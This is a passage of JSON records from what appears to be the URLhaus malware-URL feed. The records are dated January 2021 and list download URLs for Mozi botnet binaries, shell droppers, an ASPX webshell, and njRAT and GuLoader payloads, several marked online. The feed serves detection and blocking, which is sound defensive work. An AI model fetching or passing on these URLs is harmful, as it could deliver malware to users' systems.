listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961024","urlhaus_reference":"https://urlhaus.abuse.ch/url/961024/","url":"http://182.59.203.162:60081/Mozi.m","url_status":"offline","host":"182.59.203.162","date_added":"2021-01-14 16:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961025","urlhaus_reference":"https://urlhaus.abuse.ch/url/961025/","url":"http://186.33.122.4:58177/Mozi.m","url_status":"online","host":"186.33.122.4","date_added":"2021-01-14 16:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961023","urlhaus_reference":"https://urlhaus.abuse.ch/url/961023/","url":"http://125.41.164.93:38589/Mozi.m","url_status":"online","host":"125.41.164.93","date_added":"2021-01-14 16:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961022","urlhaus_reference":"https://urlhaus.abuse.ch/url/961022/","url":"http://182.120.42.220:39229/Mozi.a","url_status":"online","host":"182.120.42.220","date_added":"2021-01-14 16:35:25 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961021","urlhaus_reference":"https://urlhaus.abuse.ch/url/961021/","url":"http://121.181.32.38:53595/Mozi.a","url_status":"offline","host":"121.181.32.38","date_added":"2021-01-14 16:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961018","urlhaus_reference":"https://urlhaus.abuse.ch/url/961018/","url":"http://182.119.207.249:57279/Mozi.m","url_status":"online","host":"182.119.207.249","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961019","urlhaus_reference":"https://urlhaus.abuse.ch/url/961019/","url":"http://182.116.117.139:49019/Mozi.m","url_status":"online","host":"182.116.117.139","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961020","urlhaus_reference":"https://urlhaus.abuse.ch/url/961020/","url":"http://182.121.150.84:48558/Mozi.m","url_status":"offline","host":"182.121.150.84","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961017","urlhaus_reference":"https://urlhaus.abuse.ch/url/961017/","url":"http://120.85.167.142:58913/Mozi.a","url_status":"online","host":"120.85.167.142","date_added":"2021-01-14 16:34:25 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961016","urlhaus_reference":"https://urlhaus.abuse.ch/url/961016/","url":"http://115.58.68.51:49608/Mozi.m","url_status":"online","host":"115.58.68.51","date_added":"2021-01-14 16:34:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961013","urlhaus_reference":"https://urlhaus.abuse.ch/url/961013/","url":"http://112.168.65.51:41143/bin.sh","url_status":"online","host":"112.168.65.51","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961014","urlhaus_reference":"https://urlhaus.abuse.ch/url/961014/","url":"http://117.247.204.147:42129/Mozi.m","url_status":"offline","host":"117.247.204.147","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961015","urlhaus_reference":"https://urlhaus.abuse.ch/url/961015/","url":"http://117.247.204.127:47403/Mozi.m","url_status":"offline","host":"117.247.204.127","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961011","urlhaus_reference":"https://urlhaus.abuse.ch/url/961011/","url":"http://120.85.184.207:60187/Mozi.m","url_status":"online","host":"120.85.184.207","date_added":"2021-01-14 16:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961012","urlhaus_reference":"https://urlhaus.abuse.ch/url/961012/","url":"http://117.202.70.191:46097/Mozi.m","url_status":"offline","host":"117.202.70.191","date_added":"2021-01-14 16:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961010","urlhaus_reference":"https://urlhaus.abuse.ch/url/961010/","url":"http://211.223.74.229:50771/i","url_status":"online","host":"211.223.74.229","date_added":"2021-01-14 16:31:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961009","urlhaus_reference":"https://urlhaus.abuse.ch/url/961009/","url":"https://pastebin.com/raw/00aUJCLx","url_status":"offline","host":"pastebin.com","date_added":"2021-01-14 16:29:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"pmelson","larted":"false","tags":["ASPXShell","webshell"]} +{"id":"961008","urlhaus_reference":"https://urlhaus.abuse.ch/url/961008/","url":"http://115.56.31.76:45117/bin.sh","url_status":"online","host":"115.56.31.76","date_added":"2021-01-14 16:25:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961007","urlhaus_reference":"https://urlhaus.abuse.ch/url/961007/","url":"http://49.68.80.149:41485/Mozi.a","url_status":"online","host":"49.68.80.149","date_added":"2021-01-14 16:22:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961006","urlhaus_reference":"https://urlhaus.abuse.ch/url/961006/","url":"http://61.52.164.52:43851/Mozi.m","url_status":"online","host":"61.52.164.52","date_added":"2021-01-14 16:22:15 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961005","urlhaus_reference":"https://urlhaus.abuse.ch/url/961005/","url":"http://59.95.174.179:37095/Mozi.m","url_status":"offline","host":"59.95.174.179","date_added":"2021-01-14 16:22:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961004","urlhaus_reference":"https://urlhaus.abuse.ch/url/961004/","url":"http://58.249.18.32:59275/Mozi.m","url_status":"online","host":"58.249.18.32","date_added":"2021-01-14 16:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961002","urlhaus_reference":"https://urlhaus.abuse.ch/url/961002/","url":"http://83.224.148.209:46131/Mozi.m","url_status":"offline","host":"83.224.148.209","date_added":"2021-01-14 16:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961003","urlhaus_reference":"https://urlhaus.abuse.ch/url/961003/","url":"http://59.99.93.203:40129/Mozi.m","url_status":"offline","host":"59.99.93.203","date_added":"2021-01-14 16:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961000","urlhaus_reference":"https://urlhaus.abuse.ch/url/961000/","url":"http://27.204.253.74:43924/Mozi.m","url_status":"online","host":"27.204.253.74","date_added":"2021-01-14 16:21:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961001","urlhaus_reference":"https://urlhaus.abuse.ch/url/961001/","url":"http://117.247.202.55:38851/i","url_status":"offline","host":"117.247.202.55","date_added":"2021-01-14 16:21:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"960996","urlhaus_reference":"https://urlhaus.abuse.ch/url/960996/","url":"http://125.44.13.139:33008/Mozi.m","url_status":"offline","host":"125.44.13.139","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960997","urlhaus_reference":"https://urlhaus.abuse.ch/url/960997/","url":"http://125.46.165.217:60201/Mozi.m","url_status":"online","host":"125.46.165.217","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960998","urlhaus_reference":"https://urlhaus.abuse.ch/url/960998/","url":"http://182.119.116.38:41479/Mozi.m","url_status":"online","host":"182.119.116.38","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960999","urlhaus_reference":"https://urlhaus.abuse.ch/url/960999/","url":"http://42.228.41.177:52003/Mozi.m","url_status":"online","host":"42.228.41.177","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960995","urlhaus_reference":"https://urlhaus.abuse.ch/url/960995/","url":"http://117.222.170.18:39500/Mozi.m","url_status":"offline","host":"117.222.170.18","date_added":"2021-01-14 16:20:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960994","urlhaus_reference":"https://urlhaus.abuse.ch/url/960994/","url":"http://115.58.165.141:36966/Mozi.m","url_status":"online","host":"115.58.165.141","date_added":"2021-01-14 16:20:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960991","urlhaus_reference":"https://urlhaus.abuse.ch/url/960991/","url":"http://117.247.206.204:59875/Mozi.m","url_status":"offline","host":"117.247.206.204","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960992","urlhaus_reference":"https://urlhaus.abuse.ch/url/960992/","url":"http://117.222.171.220:44123/Mozi.m","url_status":"offline","host":"117.222.171.220","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960993","urlhaus_reference":"https://urlhaus.abuse.ch/url/960993/","url":"http://117.194.163.151:45224/Mozi.a","url_status":"offline","host":"117.194.163.151","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960990","urlhaus_reference":"https://urlhaus.abuse.ch/url/960990/","url":"http://115.63.143.46:43105/Mozi.m","url_status":"online","host":"115.63.143.46","date_added":"2021-01-14 16:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960984","urlhaus_reference":"https://urlhaus.abuse.ch/url/960984/","url":"http://120.85.208.36:46011/Mozi.m","url_status":"online","host":"120.85.208.36","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960985","urlhaus_reference":"https://urlhaus.abuse.ch/url/960985/","url":"http://115.58.48.66:51170/Mozi.m","url_status":"online","host":"115.58.48.66","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960986","urlhaus_reference":"https://urlhaus.abuse.ch/url/960986/","url":"http://115.50.229.51:38025/Mozi.a","url_status":"online","host":"115.50.229.51","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960987","urlhaus_reference":"https://urlhaus.abuse.ch/url/960987/","url":"http://115.55.213.63:54132/Mozi.m","url_status":"online","host":"115.55.213.63","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960988","urlhaus_reference":"https://urlhaus.abuse.ch/url/960988/","url":"http://125.43.210.102:57705/Mozi.m","url_status":"online","host":"125.43.210.102","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960989","urlhaus_reference":"https://urlhaus.abuse.ch/url/960989/","url":"http://123.14.38.9:32983/Mozi.m","url_status":"online","host":"123.14.38.9","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960983","urlhaus_reference":"https://urlhaus.abuse.ch/url/960983/","url":"http://113.254.197.92:47908/Mozi.m","url_status":"offline","host":"113.254.197.92","date_added":"2021-01-14 16:19:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960982","urlhaus_reference":"https://urlhaus.abuse.ch/url/960982/","url":"http://113.89.245.89:35116/Mozi.m","url_status":"offline","host":"113.89.245.89","date_added":"2021-01-14 16:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960978","urlhaus_reference":"https://urlhaus.abuse.ch/url/960978/","url":"http://115.50.159.25:38070/Mozi.m","url_status":"online","host":"115.50.159.25","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960979","urlhaus_reference":"https://urlhaus.abuse.ch/url/960979/","url":"http://112.252.130.226:53399/Mozi.m","url_status":"online","host":"112.252.130.226","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960980","urlhaus_reference":"https://urlhaus.abuse.ch/url/960980/","url":"http://112.30.4.60:39529/Mozi.m","url_status":"online","host":"112.30.4.60","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960981","urlhaus_reference":"https://urlhaus.abuse.ch/url/960981/","url":"http://112.234.156.209:33465/Mozi.m","url_status":"offline","host":"112.234.156.209","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960977","urlhaus_reference":"https://urlhaus.abuse.ch/url/960977/","url":"http://59.99.44.18:59085/Mozi.m","url_status":"offline","host":"59.99.44.18","date_added":"2021-01-14 16:16:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"07ac0n","larted":"true","tags":["elf","Mozi"]} +{"id":"960976","urlhaus_reference":"https://urlhaus.abuse.ch/url/960976/","url":"http://59.58.148.90:33799/i","url_status":"online","host":"59.58.148.90","date_added":"2021-01-14 16:09:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"960972","urlhaus_reference":"https://urlhaus.abuse.ch/url/960972/","url":"http://59.99.142.249:40430/Mozi.m","url_status":"offline","host":"59.99.142.249","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960973","urlhaus_reference":"https://urlhaus.abuse.ch/url/960973/","url":"http://59.99.47.139:43006/Mozi.m","url_status":"offline","host":"59.99.47.139","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960974","urlhaus_reference":"https://urlhaus.abuse.ch/url/960974/","url":"http://61.157.50.58:33385/Mozi.m","url_status":"online","host":"61.157.50.58","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960975","urlhaus_reference":"https://urlhaus.abuse.ch/url/960975/","url":"http://59.99.137.157:56649/Mozi.m","url_status":"offline","host":"59.99.137.157","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960971","urlhaus_reference":"https://urlhaus.abuse.ch/url/960971/","url":"http://59.99.137.202:55457/Mozi.m","url_status":"offline","host":"59.99.137.202","date_added":"2021-01-14 16:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960968","urlhaus_reference":"https://urlhaus.abuse.ch/url/960968/","url":"http://59.93.16.213:52314/Mozi.m","url_status":"offline","host":"59.93.16.213","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960969","urlhaus_reference":"https://urlhaus.abuse.ch/url/960969/","url":"http://42.230.56.231:41985/Mozi.m","url_status":"online","host":"42.230.56.231","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960970","urlhaus_reference":"https://urlhaus.abuse.ch/url/960970/","url":"http://125.41.97.157:53197/i","url_status":"online","host":"125.41.97.157","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"960967","urlhaus_reference":"https://urlhaus.abuse.ch/url/960967/","url":"http://125.43.61.168:54472/Mozi.m","url_status":"online","host":"125.43.61.168","date_added":"2021-01-14 16:06:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960966","urlhaus_reference":"https://urlhaus.abuse.ch/url/960966/","url":"http://219.154.101.44:38100/Mozi.m","url_status":"offline","host":"219.154.101.44","date_added":"2021-01-14 16:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960964","urlhaus_reference":"https://urlhaus.abuse.ch/url/960964/","url":"http://189.51.126.160:33121/Mozi.m","url_status":"offline","host":"189.51.126.160","date_added":"2021-01-14 16:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960965","urlhaus_reference":"https://urlhaus.abuse.ch/url/960965/","url":"http://14.154.28.65:39363/Mozi.m","url_status":"online","host":"14.154.28.65","date_added":"2021-01-14 16:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960961","urlhaus_reference":"https://urlhaus.abuse.ch/url/960961/","url":"http://182.119.18.6:42844/Mozi.m","url_status":"online","host":"182.119.18.6","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960962","urlhaus_reference":"https://urlhaus.abuse.ch/url/960962/","url":"http://219.156.209.2:45789/Mozi.a","url_status":"online","host":"219.156.209.2","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960963","urlhaus_reference":"https://urlhaus.abuse.ch/url/960963/","url":"http://221.15.193.168:34080/Mozi.m","url_status":"online","host":"221.15.193.168","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960960","urlhaus_reference":"https://urlhaus.abuse.ch/url/960960/","url":"http://117.194.161.162:56067/Mozi.m","url_status":"offline","host":"117.194.161.162","date_added":"2021-01-14 16:05:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960959","urlhaus_reference":"https://urlhaus.abuse.ch/url/960959/","url":"http://117.215.208.204:34205/Mozi.m","url_status":"offline","host":"117.215.208.204","date_added":"2021-01-14 16:05:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960957","urlhaus_reference":"https://urlhaus.abuse.ch/url/960957/","url":"http://117.222.162.116:53239/Mozi.m","url_status":"offline","host":"117.222.162.116","date_added":"2021-01-14 16:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960958","urlhaus_reference":"https://urlhaus.abuse.ch/url/960958/","url":"http://117.215.209.95:53868/Mozi.m","url_status":"offline","host":"117.215.209.95","date_added":"2021-01-14 16:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960955","urlhaus_reference":"https://urlhaus.abuse.ch/url/960955/","url":"http://116.75.192.72:39724/Mozi.m","url_status":"offline","host":"116.75.192.72","date_added":"2021-01-14 16:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960956","urlhaus_reference":"https://urlhaus.abuse.ch/url/960956/","url":"http://117.213.43.181:60804/Mozi.m","url_status":"offline","host":"117.213.43.181","date_added":"2021-01-14 16:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960953","urlhaus_reference":"https://urlhaus.abuse.ch/url/960953/","url":"http://123.5.149.145:51949/Mozi.m","url_status":"online","host":"123.5.149.145","date_added":"2021-01-14 16:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960954","urlhaus_reference":"https://urlhaus.abuse.ch/url/960954/","url":"http://125.41.114.210:48224/Mozi.m","url_status":"online","host":"125.41.114.210","date_added":"2021-01-14 16:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960952","urlhaus_reference":"https://urlhaus.abuse.ch/url/960952/","url":"http://113.201.171.61:37716/Mozi.m","url_status":"online","host":"113.201.171.61","date_added":"2021-01-14 16:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960951","urlhaus_reference":"https://urlhaus.abuse.ch/url/960951/","url":"http://101.108.135.252:60524/Mozi.m","url_status":"offline","host":"101.108.135.252","date_added":"2021-01-14 16:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960946","urlhaus_reference":"https://urlhaus.abuse.ch/url/960946/","url":"http://urlfrance.fr/code/dd.txt","url_status":"offline","host":"urlfrance.fr","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["Encoded","njRAT","rat"]} +{"id":"960947","urlhaus_reference":"https://urlhaus.abuse.ch/url/960947/","url":"http://136.34.57.224:49988/bin.sh","url_status":"online","host":"136.34.57.224","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"960948","urlhaus_reference":"https://urlhaus.abuse.ch/url/960948/","url":"http://115.50.64.136:42857/Mozi.m","url_status":"online","host":"115.50.64.136","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960949","urlhaus_reference":"https://urlhaus.abuse.ch/url/960949/","url":"http://200.52.228.27:44751/bin.sh","url_status":"offline","host":"200.52.228.27","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"960950","urlhaus_reference":"https://urlhaus.abuse.ch/url/960950/","url":"http://115.63.203.134:47719/Mozi.m","url_status":"online","host":"115.63.203.134","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960945","urlhaus_reference":"https://urlhaus.abuse.ch/url/960945/","url":"http://181.194.120.182:38133/Mozi.m","url_status":"offline","host":"181.194.120.182","date_added":"2021-01-14 15:59:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"07ac0n","larted":"true","tags":["elf","Mozi"]} +{"id":"960944","urlhaus_reference":"https://urlhaus.abuse.ch/url/960944/","url":"http://www.sowetoson.com/new/Host_yjwloaz52.bin","url_status":"online","host":"www.sowetoson.com","date_added":"2021-01-14 15:57:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]} +{"id":"960942","urlhaus_reference":"https://urlhaus.abuse.ch/url/960942/","url":"https://www.agamagroup.com.ng/zxc/janomo_uGdNtpvRY170.bin","url_status":"online","host":"www.agamagroup.com.ng","date_added":"2021-01-14 15:57:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not 